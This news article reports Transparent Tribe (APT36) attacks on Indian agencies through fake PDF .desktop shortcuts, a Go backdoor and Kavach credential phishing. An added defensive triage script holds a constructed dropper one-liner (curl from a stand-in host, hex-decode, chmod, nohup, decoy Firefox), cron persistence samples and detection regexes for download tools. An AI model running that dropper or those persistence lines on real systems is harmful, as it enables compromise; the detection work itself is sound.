
The Advanced Persistent Threat (APT) actor known as Transparent Tribe has been observed targeting both Windows and BOSS (Bharat Operating System Solutions) Linux systems with malicious desktop shortcut files in attacks aimed at Indian government agencies.
“Initial access is achieved through spear-phishing emails,” Cyfirma said. “The Linux BOSS environment is targeted via weaponized .desktop shortcut files.”
Transparent Tribe, also known as APT36, is assessed to be of Pakistani origin and has a long history of targeting Indian government agencies with various remote access trojans (RATs), alongside its subcluster SideCopy.
The latest dual-platform campaign shows the group's continued refinement of its tooling, allowing it to expand its targeting footprint and maintain access to compromised environments.

The attack chain starts with a phishing email that appears to be a meeting notification but in reality delivers nothing more than a booby-trapped Linux desktop shortcut file (“Meeting_ltr_id1543ops.pdf.desktop”). The .desktop file masquerades as a PDF document to trick recipients into opening it, and when launched it runs a shell script.
The shell script acts as a dropper: it fetches a hex-encoded file from the attacker-controlled server (“securestore[.]cv”), decodes and saves it to disk as an ELF binary, and at the same time opens a decoy PDF hosted on Google Drive by launching Mozilla Firefox. The Go-based binary then establishes contact with a hard-coded command-and-control (C2) server, modgovindia[.]space:4000, to receive commands, fetch additional payloads and exfiltrate data.
The malware also establishes persistence via cron jobs that automatically relaunch the main payload after a system restart or if its process is terminated.
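The delivery and persistence pattern above is easy to hunt for on a BOSS or other Debian-derived desktop. The following triage script is an added example, not code from the article or from any vendor named in it: it scores .desktop shortcut files whose Exec= line behaves like the dropper (a shell one-liner that downloads, hex-decodes, marks executable and backgrounds a payload while opening a decoy in Firefox) and flags crontab entries that relaunch a binary at boot or whenever its process is missing. The sample shortcut, crontab lines, hostnames and paths are constructed for illustration; only the shortcut filename comes from the article, and the cron syntax is an assumption about what such persistence looks like, not a quote of the malware's actual entries.

```python
"""Added example (not the article's or any vendor's code): triage .desktop
shortcuts and crontab entries for the dropper/persistence pattern described
in the article. Samples below are constructed; hostnames are stand-ins."""

import os
import re
import subprocess
from configparser import ConfigParser, Error as ConfigError

# Exec= fragments that a shortcut posing as a PDF has no business containing.
SUSPICIOUS_EXEC = [
    (r"\b(bash|sh|zsh)\s+-c\b", "inline shell command"),
    (r"\b(curl|wget)\b", "network download"),
    (r"\bxxd\s+-r\b|\bbase64\s+(-d|--decode)\b", "payload decoding"),
    (r"\bchmod\s+\+?x\b|\bchmod\s+[0-7]*7", "marks dropped file executable"),
    (r"\bfirefox\b.*https?://", "launches browser on a remote decoy"),
    (r"/tmp/|/dev/shm/|\$HOME/\.\w+", "writes to temp or hidden dir"),
    (r"\bnohup\b|&\s*$", "backgrounds a process"),
]
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", re.I)


def parse_desktop(text):
    """Return the [Desktop Entry] keys (lower-cased) or None if not a valid file."""
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except ConfigError:
        return None
    if not cp.has_section("Desktop Entry"):
        return None
    return dict(cp["Desktop Entry"])


def score_desktop(filename, text):
    """Return (severity, reason) findings for one shortcut; [] means clean."""
    findings = []
    if DOUBLE_EXT.search(os.path.basename(filename)):
        findings.append(("high", "double extension hides .desktop suffix"))
    entry = parse_desktop(text)
    if entry is None:
        findings.append(("low", "not a parseable [Desktop Entry]"))
        return findings
    exec_line = entry.get("exec", "")
    for pattern, why in SUSPICIOUS_EXEC:
        if re.search(pattern, exec_line):
            findings.append(("high", "Exec: " + why))
    if entry.get("terminal", "false").lower() == "false" and "sh -c" in exec_line:
        findings.append(("medium", "shell runs with no visible terminal"))
    if exec_line and re.search(r"pdf|document|office", entry.get("icon", ""), re.I):
        findings.append(("medium", "icon mimics a document viewer"))
    return findings


# Entries that fire at boot or every minute (assumed persistence shape).
CRON_PERSISTENCE = re.compile(r"^(?:@reboot|\*\s+\*\s+\*\s+\*\s+\*)\s+(?P<cmd>.+)$")


def suspicious_cron_lines(crontab_text):
    """Crontab lines that relaunch something from a temp/hidden path, or
    re-spawn a process when pgrep finds it missing (the "|| ./payload" idiom)."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_PERSISTENCE.match(line)
        if m and re.search(r"/tmp/|/dev/shm/|/\.\w+|\bpgrep\b|\|\|", m.group("cmd")):
            hits.append(line)
    return hits


# Constructed samples. Only the filename below is taken from the article.
MALICIOUS_NAME = "Meeting_ltr_id1543ops.pdf.desktop"
MALICIOUS_SHORTCUT = """[Desktop Entry]
Name=Meeting_ltr_id1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://example.invalid/p.hex -o /tmp/.p.hex; xxd -r -p /tmp/.p.hex > /tmp/.svc; chmod +x /tmp/.svc; nohup /tmp/.svc & firefox https://drive.google.com/file/d/EXAMPLE/view"
"""
BENIGN_SHORTCUT = """[Desktop Entry]
Name=Firefox
Exec=firefox %u
Icon=firefox
Terminal=false
"""
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update -q
@reboot /tmp/.svc
* * * * * pgrep -x .svc >/dev/null || /tmp/.svc
"""

if __name__ == "__main__":
    # Scan the usual shortcut locations of the current user, then their crontab.
    for d in ("~/Desktop", "~/Downloads", "~/.local/share/applications"):
        for root, _, files in os.walk(os.path.expanduser(d)):
            for name in (n for n in files if n.endswith(".desktop")):
                full = os.path.join(root, name)
                with open(full, errors="replace") as fh:
                    hits = score_desktop(full, fh.read())
                if hits:
                    print(full, hits)
    try:
        out = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
        print(suspicious_cron_lines(out))
    except FileNotFoundError:
        pass
```

On a real host run it as the interactive user (crontab -l only shows that user's entries) and extend the directory list to wherever your mail client saves attachments; the regexes deliberately key on behaviour (download, decode, chmod, decoy) rather than on the campaign's domains, so they still fire when the infrastructure rotates.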
Cybersecurity company CloudSEK, which independently reported on the activity, said the malware is equipped to perform system reconnaissance and a series of anti-debugging and anti-sandbox checks to evade emulators and static analyzers.
Furthermore, Hunt.io's analysis of the campaign revealed that the attack was designed to deploy a known Transparent Tribe backdoor called Poseidon, which enables data collection, long-term access, credential harvesting and potentially lateral movement.
“APT36's ability to customize delivery mechanisms according to the victim's operating environment increases the likelihood of success while maintaining sustained access to critical government infrastructure and circumventing traditional security controls,” Cyfirma said.
The disclosure comes weeks after Transparent Tribe actors targeted Indian defence organizations and associated government agencies using a spoofed domain, with the ultimate goal of stealing credentials and two-factor authentication (2FA) codes. Users are believed to be redirected to these URLs via spear-phishing emails.
“If the victim enters a valid email ID on the first phishing page and clicks the ‘Next’ button, they are redirected to the second page, which prompts the user to enter the email account password and Kavach authentication code,” Cyfirma said.
It is worth noting that the targeting of Kavach, a 2FA solution used by Indian government agencies to improve account security, is a tried-and-tested tactic adopted by Transparent Tribe and SideCopy since early 2022.

“The use of typosquatted domains in conjunction with infrastructure hosted on Pakistan-based servers is consistent with the group's established tactics, techniques and procedures,” the company said.
The findings also follow the discovery of another campaign, carried out by a South Asian threat actor, targeting Bangladesh, Nepal, Pakistan, Sri Lanka and Turkey via spear-phishing emails designed for credential theft using lookalike pages hosted on Netlify and Pages.dev.
“These campaigns mimic official communications to trick victims into entering their credentials on fake login pages,” Hunt.io said earlier this month, attributing the activity to a hacking group called SideWinder.
“The spoofed Zimbra and secure portal pages looked like an official email, file sharing or document upload service, urging victims to submit their credentials through a fake login panel.”